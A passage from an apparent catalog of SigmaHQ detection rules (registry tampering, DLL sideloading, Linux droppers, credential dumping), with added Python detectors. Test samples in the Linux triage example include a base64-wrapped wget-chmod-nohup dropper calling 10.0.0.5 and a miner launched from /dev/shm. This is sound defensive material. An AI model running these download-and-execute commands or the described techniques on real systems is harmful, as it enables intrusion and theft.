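Most of the registry entries above, from Notification_Suppress and EnableFirewall to the ETW TracingDisabled and .NET ETWEnabled keys, the DumpType value that LSASS Shtinkering needs, WDigest UseLogonCredential, DisableSR and the PowerShell logging policies, reduce to the same check: a named value under a known key set to its weak state. The following Python is an added example, not the listing's or SigmaHQ's code: a rule table over constructed ASIM-style registry events that first normalizes Sysmon's "DWORD (0x00000001)" data encoding, which parsers often pass through as a string. The key fragments are the documented locations of each setting, except the SCM tracing path, which is marked as an assumption in the code; the rule labels are names chosen here.

```python
import re

# Added example (not from the original listing): a rule table for the "set
# value X to N" registry entries above, evaluated over ASIM-style registry
# events. Sysmon records DWORD data as "DWORD (0x00000001)" and parsers may
# pass that string through unchanged, so the data is normalized to an int
# first. Key paths are the documented locations of each setting except the
# SCM tracing path, which is an assumption to verify in your environment.

_DWORD = re.compile(
    r"(?:DWORD|QWORD)\s*\((0x[0-9a-f]+)\)|^(0x[0-9a-f]+|\d+)$", re.IGNORECASE
)


def registry_int(data):
    """Parse '1', '0x1' or 'DWORD (0x00000001)' into an int; None otherwise."""
    m = _DWORD.search(str(data).strip())
    if m is None:
        return None
    hexpart, plain = m.group(1), m.group(2)
    if hexpart:
        return int(hexpart, 16)
    return int(plain, 16) if plain.lower().startswith("0x") else int(plain, 10)


# (key fragment, value name, weak-state predicate, rule label). The fragment is
# matched as a substring so per-application subkeys such as
# LocalDumps\lsass.exe and the HKCU/HKLM policy copies of a key both hit.
TAMPER_RULES = [
    (r"\SecurityProviders\WDigest", "UseLogonCredential", lambda v: v == 1, "wdigest_cleartext_credentials"),
    (r"\Windows Error Reporting\LocalDumps", "DumpType", lambda v: v == 2, "full_dump_enabled"),
    (r"\PowerShell\ScriptBlockLogging", "EnableScriptBlockLogging", lambda v: v == 0, "powershell_logging_disabled"),
    (r"\PowerShell\ModuleLogging", "EnableModuleLogging", lambda v: v == 0, "powershell_logging_disabled"),
    (r"\PowerShell\Transcription", "EnableTranscripting", lambda v: v == 0, "powershell_logging_disabled"),
    (r"\FirewallPolicy", "EnableFirewall", lambda v: v == 0, "windows_firewall_disabled"),
    (r"\Microsoft\.NETFramework", "ETWEnabled", lambda v: v == 0, "dotnet_etw_disabled"),
    (r"\Tracing\SCM\Regular", "TracingDisabled", lambda v: v == 1, "scm_tracing_disabled"),  # assumed path
    (r"\SystemRestore", "DisableSR", lambda v: v == 1, "system_restore_disabled"),
]


def match_tamper_rules(event):
    """Return the labels of every rule the event satisfies (empty if none).

    Only RegistryValueSet events count, and only when the new data moves the
    setting into its weak state, so putting a value back to the secure default
    does not alert.
    """
    if event.get("EventType") != "RegistryValueSet":
        return []
    key = (event.get("RegistryKey") or "").lower()
    value = (event.get("RegistryValue") or "").lower()
    num = registry_int(event.get("RegistryValueData", ""))
    if num is None:
        return []
    hits = []
    for fragment, name, is_weak, label in TAMPER_RULES:
        if fragment.lower() in key and value == name.lower() and is_weak(num) and label not in hits:
            hits.append(label)
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventType": "RegistryValueSet",
     "RegistryKey": r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest",
     "RegistryValue": "UseLogonCredential", "RegistryValueData": "DWORD (0x00000001)"},
    {"EventType": "RegistryValueSet",
     "RegistryKey": r"HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\lsass.exe",
     "RegistryValue": "DumpType", "RegistryValueData": "DWORD (0x00000002)"},
    {"EventType": "RegistryValueSet",
     "RegistryKey": r"HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging",
     "RegistryValue": "EnableScriptBlockLogging", "RegistryValueData": "0"},
    {"EventType": "RegistryValueSet",
     "RegistryKey": r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest",
     "RegistryValue": "UseLogonCredential", "RegistryValueData": "DWORD (0x00000000)"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(match_tamper_rules(ev), "<-", ev["RegistryKey"], ev["RegistryValue"], ev["RegistryValueData"])
```

Normalizing the data before comparing is the part most often skipped in KQL ports of these rules: a query that compares RegistryValueData to the string "1" silently misses Sysmon-sourced events, and one that compares to "DWORD (0x00000001)" misses events from parsers that already converted the value.
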
SigmaHQ source
T1490
imRegistry

Detects the modification of the registry to disable a system restore on the computer

SigmaHQ source
T1112
imRegistry

Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)

SigmaHQ source
T1112
imRegistry

Ad

SigmaHQ source
T1137
imRegistry

Hides the file extension through modification of the registry

SigmaHQ source
T1133
imRegistry

Detects Chrome VPN extensions being installed via the registry (the rule covers two VPN extensions)

SigmaHQ source
T1218.011
imRegistry

Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl

SigmaHQ source
T1685
imRegistry

Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability

evasionexploit
SigmaHQ source
T1547.001T1546.009
imRegistry

Detects modification of autostart extensibility point (ASEP) in registry.

persistence
SigmaHQ source
T1685
imRegistry

Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings

evasionexploit
SigmaHQ source
imRegistry

Detects the creation of user-specific or system-wide environment variables via the registry whose contents include suspicious commands and strings

SigmaHQ source
T1588.002
imRegistry

Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only

SigmaHQ source
T1574
imRegistry

Detects a suspicious printer driver installation with an empty Manufacturer value

SigmaHQ source
T1685
imRegistry

Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), whi

SigmaHQ source
T1547.001
imRegistry

Detects modification of autostart extensibility point (ASEP) in registry.

persistence
SigmaHQ source
T1685
imRegistry

Detects tamper attempts against Sophos AV functionality via registry key modification

SigmaHQ source
T1112
imRegistry

Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft

SigmaHQ source
T1548.002
imRegistry

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

evasion
SigmaHQ source
T1548.002
imRegistry

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

evasion
SigmaHQ source
T1548.002
imRegistry

Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)

evasion
SigmaHQ source
T1588.002
imRegistry

Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution

SigmaHQ source
T1547.001
imRegistry

Detects VBScript content stored into registry keys as seen being used by UNC2452 group

SigmaHQ source
T1112
imRegistry

Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials

credential-theft
SigmaHQ source
T1685
imRegistry

Detects the setting of Windows Defender exclusions

SigmaHQ source
imRegistry

Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks

SigmaHQ source
T1112
imRegistry

Detects when the 'AllowMultipleTSSessions' value is enabled. Which allows for multiple Remote Desktop connection sessions to be opened at once. This is often used by attacker as a way to connect to an

SigmaHQ source
T1547.004
imRegistry

Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure att

persistence
SigmaHQ source
T1547.001
imRegistry

Detects modification of autostart extensibility point (ASEP) in registry.

persistence
SigmaHQ source
T1547.001
imRegistry

Detects modification of autostart extensibility point (ASEP) in registry.

persistence
SigmaHQ source
T1112
imRegistry

Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate

backdoor
SigmaHQ source
T1112
imRegistry

Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"

backdoor
SigmaHQ source
T1112
imRegistry

Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe"

backdoorwmi
SigmaHQ source
T1059.005T1218T1202
imProcessCreate

Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript

SigmaHQ source
T1059.005T1218T1202
imProcessCreate

Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript

SigmaHQ source
T1218T1202
imProcessCreate

Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL

persistence
SigmaHQ source
imFileEvent

Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.

SigmaHQ source
T1127
imProcessCreate

Detects potentially suspicious child processes of "aspnet_compiler.exe".

SigmaHQ source
imProcessCreate

Detects usage of Gpg4win to decrypt files

SigmaHQ source
imProcessCreate

Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations.

SigmaHQ source
imProcessCreate

Detects usage of Gpg4win to encrypt files

SigmaHQ source
T1218
imProcessCreate

Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".

SigmaHQ source
T1218
imProcessCreate

Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.

SigmaHQ source
T1218
imProcessCreate

Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.

SigmaHQ source
T1569.002
imFileEvent

Detects default CSExec service filename which indicates CSExec service installation and execution

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.

SigmaHQ source
T1574.001
imProcessCreate

Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.

SigmaHQ source
T1569.002
imFileEvent

Detects default RemCom service filename which indicates RemCom service installation and execution

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "AVKkid.dll"

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "EACore.dll"

SigmaHQ source
T1219.002
imProcessCreate

Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directo

SigmaHQ source
T1127
imProcessCreate

Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe), which can be abused to execute arbitrary binaries.

backdoor
SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "vivaldi_elf.dll"

SigmaHQ source
T1219.002
imProcessCreate

Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.

SigmaHQ source
T1547.015
imFileEvent

Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.

SigmaHQ source
T1564.004
imProcessCreate

Detects use of Windows 8.3 short names, which could be used as a method to evade image-path-based detections

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "CCleanerDU.dll"

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "CCleanerReactivator.dll"

SigmaHQ source
imProcessCreate

Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script

powershellwmi
SigmaHQ source
T1059
DeviceImageLoadEvents

Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations

SigmaHQ source
T1218
imFileEvent

Detects programs on a Windows system that should not write executables to disk

SigmaHQ source
T1218
imFileEvent

Detects programs on a Windows system that should not write scripts to disk

SigmaHQ source
T1137
imFileEvent

Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.

SigmaHQ source
T1566.001
imRegistry

Alerts on trust record modification within the registry, indicating usage of macros

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "appverifUI.dll"

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "ShellDispatch.dll"

SigmaHQ source
T1140
imProcessCreate

Detects suspicious process command line that uses base64 encoded input for execution with a shell

SigmaHQ source
imProcessCreate

Detects the creation of a new named pipe using the "mkfifo" utility

SigmaHQ source
imProcessCreate

Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.

SigmaHQ source
imProcessCreate

Detects potentially suspicious child processes of a ClickOnce deployment application

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "7za.dll"

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "edputil.dll"

SigmaHQ source
T1037.001
imProcessCreate

Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence

persistence
SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary, which can be abused as a method of DLL sideloading since the "$SysReset" directory isn't created by default.

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
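
The sideloading entries above (the system-process load from C:\Users\Public, mpclient.dll loaded by Defender binaries outside their install directory, RjvPlatform.dll, and the long list of named DLLs) all reduce to comparing where a DLL was loaded from with where it should live. The following Python is an added example, not a rule from the listing or from SigmaHQ: it checks one image-load event (process image and loaded DLL, the two paths DeviceImageLoadEvents exposes) against three shapes. The directory lists and the expected-location table are starting points that are assumptions to tune for your estate, not the rules' own lists, and ntpath is used so the Windows path handling also runs on a Linux analysis host.

```python
import ntpath

# Added example (not from the original listing): evaluate one image-load event
# (the process image and the loaded DLL path, as DeviceImageLoadEvents exposes
# them) against three sideloading shapes from the entries above. The
# directory lists are starting points to tune, not the rules' own lists;
# ntpath is used so the Windows path handling also runs on a Linux analysis box.

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")
# World-writable or user-writable drop locations. C:\ProgramData is deliberately
# left out: vendors install there, so it needs per-vendor tuning.
WRITABLE_DIRS = (r"c:\users\public", r"c:\perflogs", r"c:\windows\temp")
WRITABLE_FRAGMENTS = (r"\appdata\local\temp", r"\downloads")

# Signed DLLs known to be sideloaded, and where they legitimately live (assumed).
EXPECTED_DLL_DIRS = {
    "mpclient.dll": (r"c:\program files\windows defender",
                     r"c:\programdata\microsoft\windows defender\platform"),
    "wwlib.dll": (r"c:\program files\microsoft office",
                  r"c:\program files (x86)\microsoft office"),
}


def _norm(path):
    return ntpath.normpath(path).lower()


def _under(path, roots):
    p = _norm(path)
    return any(p == r or p.startswith(r + "\\") for r in roots)


def _in_writable_dir(path):
    p = _norm(path)
    return _under(p, WRITABLE_DIRS) or any(f in p for f in WRITABLE_FRAGMENTS)


def sideload_findings(process_path, dll_path):
    """Return the rule labels triggered by one (process image, loaded DLL) pair."""
    proc_dir = ntpath.dirname(_norm(process_path))
    dll_dir = ntpath.dirname(_norm(dll_path))
    dll_name = ntpath.basename(_norm(dll_path))
    findings = []
    # A binary from system32/syswow64/winsxs pulling a DLL out of a drop folder.
    if _under(proc_dir, SYSTEM_DIRS) and _in_writable_dir(dll_dir):
        findings.append("system_process_loads_dll_from_writable_dir")
    # A known sideloading target loaded from anywhere but its install location.
    expected = EXPECTED_DLL_DIRS.get(dll_name)
    if expected is not None and not _under(dll_dir, expected):
        findings.append(f"{dll_name}_loaded_from_unexpected_dir")
    # The classic shape: signed EXE and rogue DLL side by side in a drop folder.
    if proc_dir == dll_dir and _in_writable_dir(dll_dir):
        findings.append("exe_and_dll_colocated_in_writable_dir")
    return findings


# Constructed sample pairs (not real telemetry).
SAMPLE_LOADS = [
    (r"C:\Users\Public\MpCmdRun.exe", r"C:\Users\Public\mpclient.dll"),
    (r"C:\Program Files\Windows Defender\MpCmdRun.exe", r"C:\Program Files\Windows Defender\MpClient.dll"),
    (r"C:\Windows\System32\svchost.exe", r"C:\Users\Public\Libraries\helper.dll"),
    (r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\rpcss.dll"),
]

if __name__ == "__main__":
    for proc, dll in SAMPLE_LOADS:
        print(sideload_findings(proc, dll), "<-", proc, "loads", dll)
```

The second and third checks are what the per-DLL entries above encode one DLL at a time; keeping them as data rather than as separate rules makes it cheap to add the next DLL name from a new report, while the expected-directory list is where the false positives are tuned (the Defender platform directory under ProgramData is the usual surprise).
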

SigmaHQ source
imProcessCreate

Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)

SigmaHQ source
T1546.012
imRegistry

Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys

persistence
SigmaHQ source
T1685
imProcessCreate

Detects execution of "reg.exe" to disable security services such as Windows Defender.

SigmaHQ source
T1007
imProcessCreate

Detects usage of crontab to list the tasks of the user

SigmaHQ source
T1105
imProcessCreate

Detects the use of wget to download content to a suspicious directory

SigmaHQ source
imProcessCreate

Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc.

SigmaHQ source
T1082
imProcessCreate

Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"

SigmaHQ source
T1082
imProcessCreate

Detects the use of grep to discover specific files created by the GobRAT malware

SigmaHQ source
imFileEvent

Detects the creation of shell scripts under the "profile.d" path.

SigmaHQ source
imProcessCreate

Detects execution of shells from a parent process located in a temporary (/tmp) directory

SigmaHQ source
imProcessCreate

Detects execution of binaries located in potentially suspicious locations via "nohup"

SigmaHQ source
T1105
imFileEvent

Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
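
The Linux entries above (wget or curl into /tmp or /var/tmp, scripts run from /tmp via a shell, nohup'd binaries in suspicious locations, mkfifo pipes, and the base64-encoded input executed with a shell) are typically chained in a single dropper line, with the interesting part hidden inside the base64 stage. The following Python is an added example, not the listing's or SigmaHQ's code: it triages one command line for those patterns, unwraps sh -c wrappers, decodes the base64 stage and recurses into it so the analyst sees the payload that actually ran. The sample lines, the 10.0.0.5 host and the file names are constructed for the example.

```python
import base64
import re
import shlex

# Added example (not from the original listing): triage Linux process-creation
# command lines for the patterns in the entries above (downloads into temp
# directories, scripts and binaries run from /tmp, nohup'd binaries, mkfifo
# pipes, base64-decoded shell stages) and surface the decoded stage so the
# analyst sees what actually ran. Sample lines and the 10.0.0.5 host are
# constructed for the example.

TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
OUTPUT_FLAGS = {"-O", "-o", "-P", "--output", "--output-document"}
_B64_STAGE = re.compile(
    r"echo\s+(?:-n\s+)?['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)"
)
_B64_TO_SHELL = re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:\S*/)?(?:sh|bash)\b")


def _in_temp(path):
    return any(path.startswith(d) for d in TEMP_DIRS)


def _split(cmdline):
    try:
        return shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in a hostile command line
        return cmdline.split()


def decode_base64_stage(cmdline):
    """Return the plaintext of an 'echo <b64> | base64 -d' stage, or None."""
    m = _B64_STAGE.search(cmdline)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def triage(cmdline, _depth=0):
    """Return (sorted findings, decoded stages) for one command line.

    'sh -c "..."' wrappers and base64 stages are unwrapped recursively, with a
    depth bound so a self-referencing payload cannot loop.
    """
    findings, decoded = [], []
    tokens = _split(cmdline)
    unwrapped = False
    for i, tok in enumerate(tokens):
        name = tok.rsplit("/", 1)[-1]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if i == 0 and _in_temp(tok):
            findings.append("binary_executed_from_temp_dir")
        if name in ("wget", "curl"):
            # wget -O /tmp/x, wget -P /tmp, curl -o /tmp/x
            if any(t in OUTPUT_FLAGS and j + 1 < len(tokens) and _in_temp(tokens[j + 1])
                   for j, t in enumerate(tokens)
                   if j > i):
                findings.append("download_to_temp_dir")
        elif name in SHELLS and _in_temp(nxt):
            findings.append("script_executed_from_temp_dir")
        elif name == "nohup" and _in_temp(nxt):
            findings.append("nohup_binary_in_temp_dir")
        elif name == "mkfifo" and any(_in_temp(t) for t in tokens[i + 1:]):
            findings.append("mkfifo_in_temp_dir")
        if name in SHELLS and nxt == "-c" and i + 2 < len(tokens) and _depth < 3:
            inner_f, inner_d = triage(tokens[i + 2], _depth + 1)
            findings += inner_f
            decoded += inner_d
            unwrapped = True
    if not unwrapped:
        plain = decode_base64_stage(cmdline)
        if plain is not None:
            findings.append("base64_decoded_to_shell" if _B64_TO_SHELL.search(cmdline)
                            else "base64_decoded_stage")
            decoded.append(plain)
            if _depth < 3:
                inner_f, inner_d = triage(plain, _depth + 1)
                findings += inner_f
                decoded += inner_d
    return sorted(set(findings)), list(dict.fromkeys(decoded))


# Constructed sample command lines (not real telemetry).
PAYLOAD = "wget http://10.0.0.5/a -O /tmp/a; chmod +x /tmp/a; nohup /tmp/a &"
SAMPLE_COMMANDS = [
    'bash -c "echo %s | base64 -d | sh"' % base64.b64encode(PAYLOAD.encode()).decode(),
    "curl -s http://10.0.0.5/x.sh -o /var/tmp/.x.sh",
    "sh /tmp/.x.sh",
    "mkfifo /dev/shm/.f",
    "wget https://example.org/file.tar.gz -O /home/bob/file.tar.gz",
    "/dev/shm/.k/miner -o pool.example.org:3333",
    "ls -la /tmp",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMANDS:
        print(triage(line), "<-", line)
```

Decoding the stage is what turns the generic "base64 piped to a shell" alert into a triaged one: the findings for the first sample come from the decoded payload, not from the outer command line, which on its own says nothing about where the download went or what was backgrounded.
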

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus

SigmaHQ source
DeviceImageLoadEvents

Detects PowerShell core DLL being loaded by an Office Product

SigmaHQ source
T1565.001
imProcessCreate

Detects changes to sensitive and critical files on Linux systems, i.e. files that are not expected to change without planned maintenance.

SigmaHQ source
T1218.010
imProcessCreate

Detects potentially suspicious child processes of "regsvr32.exe".

SigmaHQ source
T1218.010
imProcessCreate

Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.

powershell
SigmaHQ source
T1059.005T1059.001T1218
imProcessCreate

Detects suspicious child processes of Windows shell and scripting processes such as wscript, rundll32, powershell, mshta, etc.

powershell
SigmaHQ source
imProcessCreate

Detects potentially suspicious child processes of "GoogleUpdate.exe"

SigmaHQ source
T1218.008
imProcessCreate

Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes.

SigmaHQ source
T1102T1567T1105
imNetworkSession

Detects a non-browser process interacting with the Telegram API, which could indicate use of a covert C2

SigmaHQ source
T1552.004T1059.001
imProcessCreate

Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.

powershell
SigmaHQ source
T1036.003
imRegistry

Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.

persistence
SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "wwlib.dll"

Telegram API Access
sigma medium
SigmaHQ source
T1071.001T1102.002
imWebSession

Detects suspicious requests to Telegram API without the usual Telegram User-Agent

SigmaHQ source
T1071.001T1197
imWebSession

Detects Bitsadmin connections to domains with uncommon TLDs

SigmaHQ source
T1218.011
imProcessCreate

Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities

SigmaHQ source
imFileEvent

Detects the creation of the LiveKD driver by a process image other than "livekd.exe".

LiveKD Driver Creation
sigma medium
SigmaHQ source
imFileEvent

Detects the creation of the LiveKD driver, which is used for live kernel debugging

SigmaHQ source
imFileEvent

Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.

SigmaHQ source
T1563.002T1021.001
imProcessCreate

Detects a suspicious RDP session redirect using tscon.exe

SigmaHQ source
T1055
imProcessCreate

Detects a "dllhost" process spawning with no command line arguments, which is very rare and could indicate process injection activity or malware mimicking similar system processes.

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "chrome_frame_helper.dll"

SigmaHQ source
T1059
imProcessCreate

Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager

SigmaHQ source
T1204.002
DeviceImageLoadEvents

Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location

SigmaHQ source
T1112
imRegistry

Detects potential persistence activity via the registration of new custom protocol handlers. While legitimate applications often register protocol handlers during installation, an attacker c

persistence
SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL side loading of DLLs that are part of the Wazuh security platform

SigmaHQ source
imFileEvent

Detects the creation of binaries in the WinSxS folder by non-system processes

SigmaHQ source
T1003.001
imFileEvent

Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory

SigmaHQ source
T1685
imProcessCreate

Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities

evasion
SigmaHQ source
imFileEvent

Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is a somewhat uncommon practice, as legiti

SigmaHQ source
T1036T1003.001
imProcessCreate

Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name

evasion
SigmaHQ source
imFileEvent

Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.

SigmaHQ source
imFileEvent

Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.

SigmaHQ source
T1567.002
imFileEvent

Detects Rclone config files being created

SigmaHQ source
T1218
imProcessCreate

Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-or

powershell
SigmaHQ source
T1036T1036.003
imFileEvent

Detects the presence of Unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading technique. Only "perfect" homo

SigmaHQ source
T1036T1036.003
imProcessCreate

Detects the presence of Unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading technique. Only "perfect" homo

evasion
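
The two homoglyph entries above describe the detection in words only. The following is an added example, not code from this catalog or from SigmaHQ: a small Python detector that flags "perfect" homoglyphs in a file name or command line and shows what the token really spells. The confusables table is a constructed subset of the Unicode confusables list (assumed correct for the common Cyrillic and Greek look-alikes it contains); the `unmask` step additionally folds full-width letters via NFKC, which are a related but not "perfect" trick, and is labelled as such in the code.

```python
from __future__ import annotations

import unicodedata

# Constructed subset of the Unicode confusables table: non-ASCII letters that
# render identically to an ASCII letter in common fonts. Extend from
# https://www.unicode.org/Public/security/latest/confusables.txt as needed.
PERFECT_HOMOGLYPHS = {
    # Cyrillic lowercase
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u0455": "s",
    "\u04bb": "h", "\u0501": "d", "\u051b": "q", "\u051d": "w",
    # Cyrillic uppercase
    "\u0410": "A", "\u0412": "B", "\u0415": "E", "\u041a": "K", "\u041c": "M",
    "\u041d": "H", "\u041e": "O", "\u0420": "P", "\u0421": "C", "\u0422": "T",
    "\u0425": "X",
    # Greek
    "\u03bf": "o", "\u0391": "A", "\u0392": "B", "\u0395": "E", "\u0396": "Z",
    "\u0397": "H", "\u0399": "I", "\u039a": "K", "\u039c": "M", "\u039d": "N",
    "\u039f": "O", "\u03a1": "P", "\u03a4": "T", "\u03a5": "Y", "\u03a7": "X",
}


def find_homoglyphs(text: str) -> list[tuple[int, str, str]]:
    """Return (index, U+XXXX, ascii_lookalike) for every perfect homoglyph in text."""
    return [(i, f"U+{ord(ch):04X}", PERFECT_HOMOGLYPHS[ch])
            for i, ch in enumerate(text) if ch in PERFECT_HOMOGLYPHS]


def unmask(text: str) -> str:
    """Replace perfect homoglyphs with their ASCII twins, then apply NFKC so that
    full-width forms (a related trick, not a perfect homoglyph) fold as well."""
    folded = "".join(PERFECT_HOMOGLYPHS.get(ch, ch) for ch in text)
    return unicodedata.normalize("NFKC", folded)


def suspicious_tokens(cmdline: str) -> list[tuple[str, str]]:
    """Whitespace-separated tokens whose unmasked form differs: (as_seen, unmasked)."""
    out: list[tuple[str, str]] = []
    for tok in cmdline.split():
        plain = unmask(tok)
        if plain != tok:
            out.append((tok, plain))
    return out


if __name__ == "__main__":
    # Constructed sample: "powershell" spelled with a Cyrillic о (U+043E).
    sample = "cmd /c p\u043ewershell.exe -nop -w hidden"
    print(find_homoglyphs(sample))
    print(suspicious_tokens(sample))
```

Run the unmasked token, not the raw one, through the usual image-name and command-line matching; a rule keyed on "powershell.exe" never fires on the raw string because the two strings differ in one code point.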
SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "SolidPDFCreator.dll"

NTDS.DIT Created
sigma low
SigmaHQ source
T1003.003
imFileEvent

Detects creation of a file named "ntds.dit" (Active Directory Database)

SigmaHQ source
T1003.003
imFileEvent

Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.

SigmaHQ source
